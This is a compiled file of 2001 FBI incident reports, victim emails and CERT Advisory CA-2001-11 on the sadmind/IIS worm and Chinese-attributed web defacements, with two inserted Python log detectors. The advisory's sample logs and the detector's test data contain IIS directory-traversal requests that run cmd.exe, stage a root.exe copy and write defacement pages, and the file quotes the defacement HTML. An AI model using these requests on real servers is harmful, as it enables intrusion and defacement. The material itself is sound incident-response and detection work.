An intrusion and defacement of a web page for Craig Davis Properties located in Raleigh, NC, [redacted], telephone number: [redacted]. This web site was hosted by SyTec and defaced over the weekend of 05/05-06/01. In attempting [illegible]: [redacted], telephone number: [redacted], who represents the vendor for a telephony system which was running on the Craig Davis Properties NT server, advised two other computers running the same telephony system were also victimized over the weekend of 05/05-06/01. The intrusion into the Craig Davis Properties NT server emanated from an IP address of 200.36.108.8, which resolves to a computer located in Mexico. Information provided by [redacted], as well as an IP lookup, is provided in an enclosed 1-A envelope. [redacted] is willing to provide further assistance should he be requested to do so.


An intrusion and defacement of a web page run by Aerial Images, located at 615 Hillsborough St, Raleigh, NC, was reported on 05/08/01 by [redacted], telephone number: 919-833-9662, extension [redacted]. The web page was Aerial Images' "terranova" web site. [redacted] identified the intrusions as emanating from IP addresses 148.220.16.251 and 209.211.205.56. The 148.220.16.251 IP resolves to a computer located in Mexico, and the 209.211.205.56 IP address resolves back to LCI International. Information provided by [redacted], as well as an IP lookup, is provided in an enclosed 1-A envelope. [redacted] is willing to provide further assistance should he be requested to do so.


An intrusion and defacement of a web page hosted by Utenzi Corporation, P.O. Box 13479, 808 Aviation Parkway, Suite [redacted], [redacted], NC 27708-3479, was reported by [redacted], telephone number 919-852-0690. [redacted] advised he had dissected the hack and was willing to provide further assistance. After speaking with the NIPC, SA [redacted], Charlotte Division, Raleigh Resident Agency, instructed [redacted] to E-mail his analysis to [redacted], FBIHQ, NIPC.


Unsuccessful probes were reported by [redacted], Advanced PC, 413 S Hughes Street, Apex, NC 27502. Advanced PC provides Information Security services to its customers. The probes [redacted] identified were from IP addresses 61.139.59.73 and 61.142.242.231, which resolve to computers located in China, as well as an IP address of 211.60.222.160, which resolves to a computer located in Korea. No probes resulted in intrusions; however, due to the nature of the probes and the current tensions with China, [redacted] believed he should report the probes.


In all the aforementioned cases, both financial and 
data losses have been minimal. 


This information is being forwarded to Chicago for 
whatever action deemed appropriate. No further investigation 
will be conducted by Charlotte at this time. 




LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 
CERT Advisory CA-2001-11 
sadmind/IIS Worm 


Original release date: May 08, 2001 
Last revised: May 08, 2001 
Source: CERT/CC 




A complete revision history is at the end of this file. 
Systems Affected

- Systems running unpatched versions of Microsoft IIS
- Systems running unpatched versions of Solaris up to, and including, Solaris 7


Overview 


The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web pages.


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically to other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in the root user's home directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems.


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in the Solstice sadmind program. For more information on this vulnerability, see

http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html


After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the IIS systems. For additional information about this vulnerability, see

http://www.kb.cert.org/vuls/id/111677


Solaris systems that are successfully compromised via the worm exhibit the following 
characteristics: 


- Sample syslog entry from compromised Solaris system

May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed


- A rootshell listening on TCP port 600

- Existence of the directories
  - /dev/cub contains logs of compromised machines
  - /dev/cuc contains tools that the worm uses to operate and propagate

- Running processes of the scripts associated with the worm, such as the following:
  - /bin/sh /dev/cuc/sadmin.sh
  - /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  - /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
  - /bin/sh /dev/cuc/uniattack.sh
  - /bin/sh /dev/cuc/time.sh
  - /usr/sbin/inetd -s /tmp/.f
  - /bin/sleep 300
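Added example, not part of the CERT advisory or of the FBI file: a small Python detector that reads Solaris syslog lines of the shape shown in the sample above and flags any host that logs several sadmind core dumps inside a short window, which is what the worm's repeated overflow attempts against the sadmind service look like before one succeeds. It expands syslog's "last message repeated N time(s)" lines, because a plain grep for "core dumped" undercounts the burst, and it sorts timestamps because the advisory's own sample is not in time order. The syslog text, hostnames and PIDs below are constructed for the example.

```python
"""Flag the sadmind overflow signature in Solaris syslog: a burst of sadmind core dumps."""
import re
from datetime import datetime

# Constructed syslog text shaped like the advisory's sample. The host, PID, the
# benign sshd line and the second host are invented for this example.
SAMPLE_SYSLOG = """\
May 7 02:39:50 carrier.domain.com sshd[201]: Accepted publickey for ops from 10.0.0.5
May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed
May 7 03:10:00 other.domain.com inetd[88]: /usr/sbin/sadmind: Bus Error - core dumped
"""

LINE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (.*)$")
REPEAT = re.compile(r"^last message repeated (\d+) times?$")
CRASH = re.compile(r"/usr/sbin/sadmind: (Bus Error|Segmentation Fault) - core dumped")


def parse(text, year=2001):
    """Yield (timestamp, host, message), expanding 'last message repeated N time(s)'.

    syslogd collapses identical consecutive messages per host, so a grep for
    'core dumped' sees only half of the crashes in the sample above.
    """
    last = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        mon, day, hms, host, msg = m.groups()
        ts = datetime.strptime(f"{year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S")
        rep = REPEAT.match(msg)
        if rep:
            if host in last:                       # replay the suppressed copies
                for _ in range(int(rep.group(1))):
                    yield ts, host, last[host]
            continue
        last[host] = msg
        yield ts, host, msg


def crash_bursts(text, window_s=60, threshold=3):
    """Return {host: n} for hosts with at least `threshold` sadmind core dumps
    inside any `window_s`-second span; n is the size of the largest such burst."""
    crashes = {}
    for ts, host, msg in parse(text):
        if CRASH.search(msg):
            crashes.setdefault(host, []).append(ts)
    hits = {}
    for host, times in crashes.items():
        times.sort()                                # syslog order is not time order
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 >= threshold:
                hits[host] = max(hits.get(host, 0), j - i + 1)
    return hits


if __name__ == "__main__":
    for host, n in crash_bursts(SAMPLE_SYSLOG).items():
        print(f"{host}: {n} sadmind core dumps within 60 s; check for a shell on tcp/600 and /dev/cuc")
```

A single core dump on a host is weak evidence on its own (the second host above is not reported); the worm is recognisable by the burst, so the threshold and window are the knobs to tune against your own baseline of sadmind crashes.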


Microsoft IIS servers that are successfully compromised exhibit the following characteristics:

- Modified web pages that read as follows:

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

- Sample Log from Attacked IIS Server

2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
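Added example, not code from the advisory, from Microsoft or from the FBI file: a Python scan over IIS W3C extended log lines that flags the request chain shown in the sample log above, including the MS00-078 form in which the traversal hides behind overlong UTF-8 such as %c0%af (an illegal encoding of '/') or %c1%9c (of '\'). The advisory's lines print the path already decoded; the code below decodes the way the vulnerable server did, canonicalises the path, and reports whether the request left the web root, whether it reached cmd.exe or the worm's copy root.exe, whether it staged that copy, and whether it wrote a page with echo. Requests under /scripts/ or /msadc/ with no other finding are listed as probes, the pattern the Cleveland report in this file describes. The log lines and addresses are constructed, not captured traffic.

```python
"""Flag IIS log lines that match the MS00-078 traversal / sadmind-IIS worm chain."""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-extended log lines (date time c-ip - s-ip s-port method
# uri-stem uri-query status -). They imitate the shapes in the advisory's sample
# log and the probes described in the field reports; none are real traffic.
SAMPLE_LOG = (
    r"2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -",
    r"2001-05-06 12:20:20 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -",
    r"2001-05-06 12:20:21 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -",
    r"2001-05-06 12:20:22 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<html>hacked</html>+>.././index.asp 502 -",
    r"2001-05-10 21:30:02 10.10.10.11 - 10.20.20.20 80 GET /msadc/default.htm - 404 -",
    r"2001-05-06 12:21:00 10.10.10.12 - 10.20.20.20 80 GET /default.asp - 200 -",
)

WATCHED_DIRS = ("/scripts/", "/msadc/")     # virtual directories hit in the reports
SHELL_NAMES = {"cmd.exe", "root.exe"}        # root.exe is the worm's renamed copy of cmd.exe
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)   # 2-byte overlong UTF-8 (MS00-078)


def lenient_utf8_decode(raw: bytes) -> str:
    """Decode like the vulnerable IIS did: accept overlong 2-byte UTF-8 forms.

    0xC0 0xAF is an overlong encoding of '/', 0xC1 0x9C of '\\'. A strict
    decoder rejects them, which is why a check on the raw URL saw no extra
    separator while the file system did.
    """
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))        # everything else taken byte-wise
            i += 1
    return "".join(out)


def canonicalize(uri_stem: str):
    """Return (canonical path, escaped_webroot) after decoding and resolving '..'."""
    decoded = lenient_utf8_decode(unquote_to_bytes(uri_stem)).replace("\\", "/")
    stack, escaped = [], False
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True        # more '..' than directories: left the web root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped


def classify(line: str):
    """Return (client_ip, stem, tags) for one W3C log line, or None if unparsable."""
    f = line.split()
    if len(f) < 10:
        return None
    c_ip, stem, query = f[2], f[7], f[8]
    path, escaped = canonicalize(stem)
    q = lenient_utf8_decode(unquote_to_bytes(query)).replace("+", " ").lower()
    tags = set()
    if escaped:
        tags.add("traversal")
        if OVERLONG.search(stem):
            tags.add("overlong-utf8")
    if path.rsplit("/", 1)[-1].lower() in SHELL_NAMES:
        tags.add("shell-exec")
    if "copy" in q and "cmd.exe" in q:
        tags.add("shell-staging")     # copying cmd.exe into a web-reachable directory
    if "echo" in q and ">" in q:
        tags.add("defacement-write")  # echo ... > page: the worm's defacement step
    if not tags and stem.lower().startswith(WATCHED_DIRS):
        tags.add("probe")
    return c_ip, stem, tags


def scan(lines):
    """Classify every line; return findings and a per-client count of flagged lines."""
    findings, per_ip = [], Counter()
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        c_ip, stem, tags = parsed
        findings.append({"ip": c_ip, "stem": stem, "tags": sorted(tags)})
        if tags:
            per_ip[c_ip] += 1
    return findings, per_ip


if __name__ == "__main__":
    findings, per_ip = scan(SAMPLE_LOG)
    for hit in findings:
        print(hit["ip"], hit["stem"], ",".join(hit["tags"]) or "-")
    print("flagged lines per client:", dict(per_ip))
```

The per-client counter is what turns a run of identical probes (the fourteen attempts in the Cleveland report) into one item to block at the firewall, and the overlong-utf8 tag is the one that separates an MS00-078 exploit attempt from an ordinary scanner hitting /scripts/.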


II. Impact

Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems compromised by this worm can suffer modified web content.

Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems.

We are receiving reports of other activity, including one report of files being destroyed on the compromised Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this worm.


III. Solutions

Apply a patch from your vendor

A patch is available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS00-078.asp


For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

For IIS Version 5:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Additional advice on securing IIS web servers is available from

http://www.microsoft.com/technet/security/iischk.asp
http://www.microsoft.com/technet/security/tools.asp


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191:

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


Appendix A. Vendor Information 


Microsoft Corporation 

The following documents regarding this vulnerability are available from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

Sun Microsystems

Sun has issued the following bulletin for this vulnerability:

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba


References 


1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode in url (MS00-078)
   http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
   http://www.cert.org/advisories/CA-1999-16.html

Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer

This document is available from: http://www.cert.org/advisories/CA-2001-11.html
Email: cert@cert.org 

Phone: +1 412-268-7090 (24-hour hotline) 

Fax: +1 412-268-6989 

Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.


Using encryption 


We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is 
available from 


http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/


To subscribe to the CERT mailing list for advisories and bulletins, send email to 
majordomo@cert.org. Please include in the body of your message 


subscribe cert-advisory 


* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark 
Office. 


NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.


Conditions for use, disclaimers, and sponsorship information 
Copyright 2001 Carnegie Mellon University. 


Revision History 


May 08, 2001: Initial Release 
May 08, 2001: Formatting change to improve printing 
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 05/15/2001
To: Counterterrorism    Attn: NIPC, CIU, SSA [redacted]
    Chicago    Attn: SA [redacted]
From: Cleveland, Squad 16
Contact: [redacted]
Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)
Title: Unsubs; Pioneer Standard Electronics, Solon, OH - Victim; Unauthorized Intrusions from China

Synopsis: Attempts were made to gain unauthorized access to a Cleveland area web server from China on 5/10/01, and unauthorized access was obtained on a mailbox exchange web server on 5/9/01, at which time a default web page was defaced.

Details: [redacted], Pioneer Standard Electronics, 28600 Fountain Parkway, Solon, OH, telephone [redacted], advised SA [redacted] on 5/15/01 that attempts were made by hackers in China to make unauthorized access to the web site for Pioneer Standard, www.underground.pios.com. [redacted] advised that underground.pios.com is a secured business to business e-commerce web site for computer systems divisions of Pioneer Standard Electronics. He advised that the firewall (199.33.129.111) and four web servers are physically located in Garfield Heights, OH. He advised that when a web browser points to the underground.pios.com address, the firewall can direct them to any of the four web servers on a rotation basis. [redacted] advised that the system is set up to e-mail him when errors on the servers occur. He stated that on 5/10/2001 at 11:52 AM EST he was notified via email by [redacted], firewall administrator, Garfield Heights location. [redacted] then observed attempts by some hacker from "helc.edu.cn", a site of a Chinese University, making ping and http commands against their web server. [redacted] interpreted these commands as attempting to access the system files on the server. He advised that the servers run Windows 2000. [redacted] advised that the attempts to access their system were exclusively at port 80 (the http protocol) at a "\scripts" directory. [redacted] advised that the hacker made 14 identical attempts at accessing the system folders. [redacted] advised that [redacted] blocked access from the Chinese IP address at the firewall.


[redacted] advised that then, at 21:30 on 5/10/2001, another attempt was made on their web server to gain unauthorized access. These http commands were directed to default web pages at the "\msadc" directory. This attempt was made from a site in Asia with an IP address of 211.91.132.240. [redacted] advised that this IP address does not resolve to a domain name. He advised that the address is a SunOS box that can be accessed using telnet. [redacted] advised that he checked other sites on the class B network with this IP address and determined that they were all from China and Taiwan. [redacted] had this IP blocked at the router.

[redacted] advised that [redacted] had then determined that an external machine off their network, an exchange mailbox web server, was accessed sometime on 5/9/2001 and an unused default web page was defaced. The defaced page stated "Fuck the US Government" and was signed by someone using a name like "Poizon". The defaced page also made a reference to contacting the Administrator at Yahoo.com. [redacted] did not save a copy of the defaced page.

[redacted] has not determined a dollar loss due to this hacking incident but advised that he spent one full day resolving the problem and the firewall administrator spent a few hours on this problem.


Cleveland is providing this information to Chicago since Chicago is coordinating all web page defacements/unauthorized intrusions from China.
LEAD(s):
Set Lead 1: COUNTERTERRORISM
AT WASHINGTON, DC
Read and clear.
Set Lead 2: CHICAGO
AT CHICAGO
Action deemed appropriate.
FD-302 (Rev. 10-6-95)

FEDERAL BUREAU OF INVESTIGATION

Date of transcription 05/11/2001

Investigation on 05/09/2001 at Pendleton, Oregon (telephonically)


b6 


On May 9, 2001, [redacted], Union Baker Educational Service District, 10100 McAlister Road, Island City, Oregon 97850, (541) 963-4106, FAX (541) 963-7256, telephonically contacted the writer and advised of the following:


Her network suffered two attacks, the first coming on May 
5, 2001. She did not become aware of the attack until 05/07/2001 
when a web page was inserted to her site in place of a page that 
should have allowed booking of multi media films for the school 
district. The hackers redirected all of her links so that after 
seeing the opening page of the ESD web site users were directed to 
a page that read "fuck USA Government, fuck PoizonBOx, contact:sysadmcn@yahoo.com.cn". The page was red lettering on a black background.


The box that was attacked was using NT 4.0 running 
Service Pack 6A. The only function of the box was to reserve films 
and constituted a small part of her network. In researching the 
attack, she determined that a file RIT.EXE had been placed in the 
\Scripts directory. It appeared to her that this file would allow 
the hackers to have back door access to her system. She also 
thought that it would have allowed them to log passwords as her 
users logged onto the system. 


Her system has a direct link through multiple T1 
connections to the University of Oregon. Most school districts 
receive connections to the Internet through Oregon Public 
Education. However, because of her remote location and the fact 
that several school districts connect through her system she was 
given direct access to the University of Oregon. She believed the 
other school districts that were attacked also were directly 
connected to the University of Oregon rather than through Oregon 
Public Education. 

[redacted] provided two copies of NeoTrace routings regarding the attack sites. She also provided a copy of the HTML code for the inserted page. [redacted] is willing to cooperate in any way she could to aid in the investigation of this matter.
Date dictated 05/11/2001

This document is the property of the FBI and is loaned to your agency; it and its contents are not to be distributed outside your agency.
Reference:

From: [redacted]
Sent: Thursday, May 10, 2001 12:15 PM
To: 'eugene.portland@fbi.gov'
Attachments: default.asp, index.asp, default.htm, index.htm

> The Corvallis Clinic, P.C.
> http://www.corvallis-clinic.com
> P 541-753-1618
> F 541-758-2685
> ****************************************
> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
> for the sole use of the intended recipients and may contain confidential
> and privileged information. Any unauthorized review, use, disclosure or
> distribution is prohibited. If you are not the intended recipient, please
> contact the sender by reply e-mail and destroy all copies of the original
> message. Any stated opinions are those of the author and are not
> necessarily those of The Corvallis Clinic
>


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p
align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p
align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p
align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn


From: [redacted]
Sent: Monday, May 14, 2001 6:33 PM
To: [redacted]
Subject: The Corvallis Clinic, P.C.

[illegible]:
Here is what I have found so far.
<<corvallis.zip>>
> The Corvallis Clinic, P.C.
> http://www.corvallis-clinic.com
> P 541-753-1618
> F 541-758-2685
> ****************************************
> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
> for the sole use of the intended recipients and may contain confidential
> and privileged information. Any unauthorized review, use, disclosure or
> distribution is prohibited. If you are not the intended recipient, please
> contact the sender by reply e-mail and destroy all copies of the original
> message. Any stated opinions are those of the author and are not
> necessarily those of The Corvallis Clinic
>
From: [redacted]
Sent: Monday, May 14, 2001 11:23 PM
To: MIS
Cc: Endeavour; [redacted]
Subject: Changes due to the hack.
Importance: High


Using Patch Work (patchwrk.exe) from the Global Incident Analysis Center I analyzed the vulnerabilities on Endeavour. Using the Microsoft Windows update http://windowsupdate.microsoft.com/ I downloaded and installed the recommended security patches. Using Patch Work I applied the suggested patches in Microsoft security bulletins MS99-025, MS00-008 and MS00-086. Reran Patch Work and came up clean on all but one registry issue. I have not been able to get this remaining suggested patch to take. Will look into it more tomorrow. Most if not all of the holes have been plugged.


On all servers the FTP and WEB services have been disabled or set to manual start. Additionally the PCanywhere on Challenger and Exeter have been set to manual. If anyone such as HBOC needs access to these servers the PCanywhere host service must be manually started and then stopped after the support access is completed. The FTP services on the av3650, d380 and g70 have been left on. These three systems are not accessible from the Internet. FTP is necessary on the av3650, d380 and g70 for HBOC support, and they are not accessible by anonymous; the user must have a valid user ID and password.


During the analysis, the first attack on Endeavour was 3/3/2001; the last one was last Friday, 5/12/2001. Each one would progress a little further. It appears that there were attacks on 5/4/2001 and 5/10/2001. The web page defacing took place on the 4th and the 10th of May. The attack on Friday the 12th was unsuccessful due to us catching it on Thursday and stopping services, changing file names and registry entries.


The attack takes advantage of known vulnerabilities in Microsoft's IIS that had not been patched. The attacker would FTP a set of files to the FTP server. Using a web browser, they would enter a URL string that would make a copy of CMD.EXE in the scripts directory on the IIS server. Then, using the web browser and the copied CMD file, they would execute the FTP'd files to install applications and services on the server. These services would then allow the intruder to take control of the server and gain access to the file system of the server. This would also allow them to capture the login name and password of the user logging into the server, in our case the administrator's account. It is assumed at this point the attacker has our administrative password. After installing a few utilities, programs and ASP scripts, they would delete most of the downloaded items, leaving only what was necessary to maintain control.


When monitoring our servers, telltale signs of an attack are the services MMTASK, OS2SRV and INDEX running, and processes running such as FireDaemon.exe, Newgina.dll and SUD.exe. If anyone sees these on any servers notify [redacted] or [redacted] immediately; page us if you have to. Not all of these must be running at the same time, but any one or more in any combination. The tools for this kind of an attack are readily available on the Internet and could have been accomplished by any knowledgeable, determined teenager.


I have not been able to determine beyond a doubt what other information has been compromised. It however appears that no other systems or data have been accessed. There is no evidence to suggest that there has been anything done beyond defacing a few web pages and obtaining the administrator's password. I have been working with an FBI agent in Portland, [redacted], concerning this attack. Agent [redacted] has told me that there have been 15 known attacks exactly like ours on sites in Oregon in the last few weeks. In all cases the extent of the damage was defacing of web pages only. These attacks are coming from locations inside the People's Republic of China. At Agent [redacted]'s request I have sent him copies of log files and other information pertinent to the investigation.


In the next few days we will be evaluating the impact on server processes and other systems of changing the administrator's password. All other passwords should be changed based on the assumption that other passwords have been obtained. There is no evidence that they have; it is assumed. It is better to be safe than sorry. [redacted] and I are evaluating the configuration of the PIX firewall to tighten up access to our systems. This type of attack can not be prevented by a firewall. However, the more access there is through the firewall to internal systems the more vulnerable we are.


This has been one of those things that you wish had not happened, should not have happened, but has turned into a valuable learning experience. I hope that this has opened our eyes as a department to the importance of security, tech bulletins and system patches. Let us all work together and diligently pursue a secure environment for our patients' data. Events such as this could have a direct impact on patient care and the reputation of the clinic.


> [redacted], The Corvallis Clinic, P.C.
> http://www.corvallis-clinic.com
> P 541-753-1618
> F 541-758-2685
> ****************************************
> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
> for the sole use of the intended recipients and may contain confidential
> and privileged information. Any unauthorized review, use, disclosure or
> distribution is prohibited. If you are not the intended recipient, please
> contact the sender by reply e-mail and destroy all copies of the original
> message. Any stated opinions are those of the author and are not
> necessarily those of The Corvallis Clinic
>
Attachments: README.TXT, DEFAULT.ASP, DEFAULT.HTM, INDEX.ASP, INDEX.HTM, log.zip
Monday, May 14, 2001


On Monday, at approximately 8AM, I received notification that, while trying to access our web site, users and employees instead saw the attached file in place of our normal web page.


One of our IT employees arrived at the lab before | did, and was able to 
copy our regular web site files back into place. He put the files left by 
the hacker into a separate directory for future reference. He said he also 
found that the hackers had left copies of their web page in a number of 
other directories. It appears that none of our files were deleted, changed 
or damaged. 


The setup for the Coffey Labs computer that was hacked is:

2 x86 Family 6 Model 5 Stepping Genuine Intel 400 MHz CPUs, with 526 megs of RAM. We are running NT 4.0, build 1381, Service Pack 5. If you need more hardware info, NIC cards, etc., I'd be happy to supply a full run-down.


One of the sites that we host for a client (Grand European Tours, or GET) also had its web site replaced with the hackers' web page. There was a log report from the GET hack, and I have attached the zipped files to this report.


Please feel free to contact me with any questions. The ones I can't answer I will relay to the proper parties here, and then get back to you.

Thank you for your interest, and again, if I can be of any further assistance, please let me know.

[redacted]
Coffey Laboratories, Inc.
12423 NE Whitaker Way - Portland, Oregon 97230
503-254-1794
fax 503-254-1452
beat down all the hegemonism of the world

China Redhackers wi

All the Chinese must be united and battle for honour of our homeland

Fuck U.S.A

This Website was hacked by ?Jelly? of ChinaEagle
for beating down all the hegemonism of USA
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE    Date: 05/17/2001

To: Counterterrorism    Attn: Computer Investigations Unit, CIOS, NIPC, SSA [redacted], SSA [redacted], Room 11719
From: Portland, Squad 4
Contact: SA [redacted], (503) 615-6627
Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted] (Pending)
Title: HACKER/HONKER UNION OF CHINA; CHICAGO SYSTEMS GROUP - VICTIM; INTRUSION
Synopsis: Furnish Chicago with Web Defacement incident reports.
Enclosure(s): Enclosed for Chicago are the following:

1. May 7, 2001 e-mail, with attachments, from [redacted], Timber Products Company, to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

2. May 7, 2001 Facsimile from NIPC to SA [redacted], submitted by [redacted], Port of Portland.

3. May 14, 2001 e-mail, with attachments, from [redacted] to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

4. May 9, 2001 e-mail from [redacted], Multnomah County ISD, to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

5. May 9, 2001 Facsimile from [redacted], Union Baker Education Service District (ESD), to SA [redacted].

6. May 15, 2001 e-mail, with attachments, from [redacted], Union Baker ESD, to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

7. Original and copy of an FD-302 for interview of [redacted] and 1A containing interview notes.

8. May 10, 2001 e-mail, with attachments, from [redacted], The Corvallis Clinic, to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

9. May 14, 2001 e-mail, with attachments, from [redacted] to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

10. May 14, 2001 e-mail from [redacted] to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

11. May 14, 2001 e-mail, with attachments, from [redacted], Coffey Labs, to SA [redacted] (previously forwarded to SA [redacted] via e-mail).

12. Printout of web page for Lincoln City Chamber of Commerce (www35.npt.clipper.net).


Details: Pursuant to telephone calls between SA [redacted] and SA [redacted], Portland is submitting to Chicago reports of the following China-originated web site defacements:

On May 4, [redacted], Timber Products Company, Inc., [redacted], Springfield, Oregon 97477, Telephone [redacted], advised Portland that a server, hosting their corporate home page at IP address 207.109.247.150, had been compromised. Their web page was replaced with the following information:

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


[redacted] indicated that the web site was running on a Microsoft IIS4 web server with NT service pack 5. The server was behind an Axent Raptor 6.5 firewall and was also protected with a strong NT password. The firewall logged the Port 80 attack originating from IP 211.96.252.251, which resolves to China United Telecommunications Corporation. The attack exploited a vulnerability in IIS. The web server was subsequently rebuilt, costing several hours of time. [redacted] found no evidence that the attacker did anything but replace the web page. [redacted] also found no evidence of the remaining network being compromised. [redacted] provided firewall logs in the enclosed e-mail.




